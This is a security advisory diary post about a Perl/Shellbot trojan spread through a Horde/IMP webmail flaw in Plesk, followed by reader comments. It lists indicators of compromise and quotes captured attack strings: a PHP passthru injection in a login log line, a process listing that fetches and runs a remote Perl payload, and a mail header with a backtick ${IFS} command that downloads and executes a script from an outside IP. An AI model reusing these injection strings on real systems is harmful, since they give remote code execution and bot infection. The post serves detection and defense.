Active Perl/Shellbot Trojan

Published: 2013-10-26
Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
2 comment(s)

ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at 89.248.172.144. What we have so far, it appears it is exploiting older version of Plesk.

Update

This Bot exploit a vulnerability in Horde/IMP Plesk webmail, you might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info which appears to be exploiting a Plesk [4] vulnerability and maybe other to connect to 93.174.88.125 which a lot of activity has been reported to DShield for the past 3 days.

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely going to see similar Apache processes:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://fallencrafts.info/download/himad.png

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

2 comment(s)

Comments

I received an interesting attempt to infect my mailserver with the Shellbot Trojan. The command to download and execute the trojan is sent as subject line and as reply to.

I have no idea, how that command shall be executed, at least my postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail, because it was identified as spam and redirected), the intended target is not the mail client.

Find attached the mail including headers (two header lines with only local information removed):

Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
Received: from localhost (localhost [127.0.0.1])
by mail.######.de (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
MISSING_DATE=1.36, MISSING_HEADERS=1.021, MISSING_MID=0.497,
MISSING_SUBJECT=1.799, RDNS_NONE=0.793, TO_NO_BRKTS_NORDNS=0.001]
autolearn=no
Received: from mail.######.de ([127.0.0.1])
by localhost (mail.######.de [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [1.234.45.84])
by mail.######.de (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <20131104155812.6E6AB482E1@mail.######.de>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com

x
The way that this is happening is through the plesk vulnerability in the about article. It may affect more than just plesk related systems but all systems using horde. They can execute it via the login screen. Take a look at this http://kb.parallels.com/en/113374. I've dealt a lot with these, if you need more assistance with this particular issue, you can always email me directly at kestrel@trylinux.us, or zwikholm@cari.net

Diary Archives